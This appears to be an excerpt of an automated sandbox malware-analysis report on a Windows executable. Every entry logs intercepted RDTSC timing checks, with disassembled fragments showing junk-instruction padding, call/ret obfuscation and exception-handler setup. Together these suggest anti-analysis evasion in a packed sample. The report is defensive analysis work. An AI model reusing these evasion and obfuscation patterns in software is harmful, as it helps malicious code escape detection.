Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F83F60 second address: F83F65 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F84FA7 second address: F84FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F84FAB second address: F84FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F84FAF second address: F84FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F84FB5 second address: F84FCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB391Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85E9C second address: F85EA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85EA0 second address: F85ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD714BB3929h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FD714BB391Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85ECF second address: F85F17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and edi, 2AE620A2h 0x00000010 push 00000000h 0x00000012 mov bx, di 0x00000015 push 00000000h 0x00000017 mov edi, 6EBB181Ah 0x0000001c xchg eax, esi 0x0000001d jmp 00007FD714BB0758h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jnp 00007FD714BB0748h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F89113 second address: F8914F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB3925h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FD714BB3927h 0x00000013 jnp 00007FD714BB3916h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8914F second address: F891B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007FD714BB0746h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, eax 0x0000000f push 00000000h 0x00000011 sub dword ptr [ebp+122D2C62h], edx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FD714BB0748h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov ebx, 4554F195h 0x00000038 xchg eax, esi 0x00000039 jmp 00007FD714BB0757h 0x0000003e push eax 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 jp 00007FD714BB0746h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8B020 second address: F8B033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD714BB391Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92B6A second address: F92B9B instructions: 0x00000000 rdtsc 0x00000002 je 00007FD714BB0767h 0x00000008 jmp 00007FD714BB074Dh 0x0000000d jmp 00007FD714BB0754h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pushad 0x00000018 popad 0x00000019 pop esi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92D0F second address: F92D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F92D13 second address: F92D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9302A second address: F93032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F93032 second address: F93038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85141 second address: F85145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F85145 second address: F851CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov dword ptr [ebp+1245646Ch], esi 0x0000000e push dword ptr fs:[00000000h] 0x00000015 pushad 0x00000016 jne 00007FD714BB0746h 0x0000001c sbb edi, 55E78161h 0x00000022 popad 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a mov ebx, edi 0x0000002c mov eax, dword ptr [ebp+122D0019h] 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FD714BB0748h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c mov ebx, dword ptr [ebp+122D19DEh] 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push ecx 0x00000057 call 00007FD714BB0748h 0x0000005c pop ecx 0x0000005d mov dword ptr [esp+04h], ecx 0x00000061 add dword ptr [esp+04h], 00000018h 0x00000069 inc ecx 0x0000006a push ecx 0x0000006b ret 0x0000006c pop ecx 0x0000006d ret 0x0000006e mov di, 7282h 0x00000072 movsx ebx, si 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 jnl 00007FD714BB0748h 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F87112 second address: F871B9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD714BB3916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FD714BB3918h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d or dword ptr [ebp+122D3097h], edx 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007FD714BB3918h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 call 00007FD714BB3928h 0x00000059 push ebx 0x0000005a jno 00007FD714BB3916h 0x00000060 pop edi 0x00000061 pop ebx 0x00000062 mov eax, dword ptr [ebp+122D0A35h] 0x00000068 mov edi, dword ptr [ebp+122D2F4Ah] 0x0000006e push FFFFFFFFh 0x00000070 nop 0x00000071 jg 00007FD714BB3924h 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a push esi 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8815A second address: F88164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FD714BB0746h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F871B9 second address: F871BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F893B8 second address: F893BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8B356 second address: F8B361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD714BB3916h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F871BE second address: F871C8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD714BB074Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F88164 second address: F881FF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD714BB3916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FD714BB3918h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov edi, ecx 0x00000029 mov bl, 78h 0x0000002b push dword ptr fs:[00000000h] 0x00000032 add edi, 126C6C1Fh 0x00000038 mov edi, 46D2311Ah 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007FD714BB3918h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 0000001Ah 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov edi, ecx 0x00000060 mov eax, dword ptr [ebp+122D02BDh] 0x00000066 add dword ptr [ebp+1247B3E3h], ecx 0x0000006c push FFFFFFFFh 0x0000006e jmp 00007FD714BB3924h 0x00000073 nop 0x00000074 push eax 0x00000075 push edx 0x00000076 push ecx 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8407D second address: F840F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB0755h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d push edx 0x0000000e sub dword ptr [ebp+1247B3E3h], ecx 0x00000014 pop edi 0x00000015 push dword ptr fs:[00000000h] 0x0000001c jnp 00007FD714BB074Ch 0x00000022 add edi, 138B28A0h 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f jmp 00007FD714BB0759h 0x00000034 mov eax, dword ptr [ebp+122D0D11h] 0x0000003a clc 0x0000003b push FFFFFFFFh 0x0000003d mov dword ptr [ebp+122D2EEDh], ebx 0x00000043 nop 0x00000044 pushad 0x00000045 jmp 00007FD714BB074Bh 0x0000004a push eax 0x0000004b push edx 0x0000004c jc 00007FD714BB0746h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F881FF second address: F88204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F88204 second address: F88222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB0753h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F988DA second address: F988F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD714BB391Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F989B7 second address: F989DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jno 00007FD714BB0748h 0x00000011 pop esi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98AA8 second address: F98AE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 jmp 00007FD714BB3922h 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FD714BB3929h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98AE5 second address: F98AEF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD714BB0746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98AEF second address: F98B1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FD714BB3916h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 jmp 00007FD714BB3928h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98B1F second address: F98B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98B28 second address: DB8A03 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 jmp 00007FD714BB3921h 0x0000000d push dword ptr [ebp+122D0345h] 0x00000013 jmp 00007FD714BB3928h 0x00000018 call dword ptr [ebp+122D1AF0h] 0x0000001e pushad 0x0000001f xor dword ptr [ebp+122D30D0h], esi 0x00000025 xor eax, eax 0x00000027 mov dword ptr [ebp+122D2ED5h], esi 0x0000002d xor dword ptr [ebp+122D2ED5h], ebx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 pushad 0x00000038 stc 0x00000039 mov eax, ecx 0x0000003b popad 0x0000003c mov dword ptr [ebp+122D281Ch], eax 0x00000042 pushad 0x00000043 mov edx, 032E1A26h 0x00000048 and edx, 6AAE6200h 0x0000004e popad 0x0000004f mov esi, 0000003Ch 0x00000054 xor dword ptr [ebp+122D30D0h], ebx 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e jmp 00007FD714BB3920h 0x00000063 lodsw 0x00000065 jg 00007FD714BB392Dh 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f jmp 00007FD714BB391Ah 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 pushad 0x00000079 mov bh, 08h 0x0000007b mov cx, E6C3h 0x0000007f popad 0x00000080 nop 0x00000081 pushad 0x00000082 ja 00007FD714BB391Ch 0x00000088 push eax 0x00000089 push edx 0x0000008a push edi 0x0000008b pop edi 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F30A62 second address: F30A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F30A75 second address: F30A7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9C98D second address: F9C998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD714BB0746h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9C998 second address: F9C99D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9C99D second address: F9C9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD714BB0753h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9CB05 second address: F9CB0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9CB0A second address: F9CB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD714BB0746h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FD714BB0746h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9D0A8 second address: F9D0B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jo 00007FD714BB391Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9D0B9 second address: F9D0C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9D0C1 second address: F9D0C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9D0C5 second address: F9D0E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD714BB074Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FD714BB0746h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9D233 second address: F9D244 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007FD714BB3916h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA294D second address: FA295A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA187E second address: FA188D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB391Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA19EA second address: FA19F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1DF2 second address: FA1DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA1439 second address: FA146B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD714BB0746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FD714BB0759h 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jg 00007FD714BB0746h 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA146B second address: FA1477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA209D second address: FA20A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA20A1 second address: FA20DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD714BB3922h 0x0000000c jmp 00007FD714BB3927h 0x00000011 push edx 0x00000012 pop edx 0x00000013 jnl 00007FD714BB3916h 0x00000019 popad 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6ADDC second address: F6AE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 jns 00007FD714BB074Ch 0x0000000f lea eax, dword ptr [ebp+12485BBDh] 0x00000015 mov edi, 298C534Ah 0x0000001a nop 0x0000001b jc 00007FD714BB075Dh 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6AE06 second address: F51211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD714BB391Fh 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FD714BB3920h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FD714BB3918h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b pushad 0x0000002c or dword ptr [ebp+122D1BAAh], ecx 0x00000032 jmp 00007FD714BB3921h 0x00000037 popad 0x00000038 call dword ptr [ebp+122D2BE9h] 0x0000003e push eax 0x0000003f push edx 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6AF1D second address: F6AF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD714BB0746h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B06A second address: F6B06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B308 second address: F6B313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD714BB0746h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B313 second address: F6B325 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD714BB391Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B4BA second address: F6B4E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e js 00007FD714BB0748h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B618 second address: F6B61D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B61D second address: F6B62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B62A second address: F6B62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B62E second address: F6B660 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD714BB0746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b xchg eax, esi 0x0000000c jmp 00007FD714BB0758h 0x00000011 nop 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD714BB074Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B778 second address: F6B77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B77E second address: F6B782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6B782 second address: F6B7A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FD714BB391Dh 0x00000014 jnc 00007FD714BB3916h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BD67 second address: F6BDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 movsx edi, bx 0x0000000b push 0000001Eh 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FD714BB0748h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov edi, ecx 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jns 00007FD714BB074Ch 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6C053 second address: F6C066 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB391Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
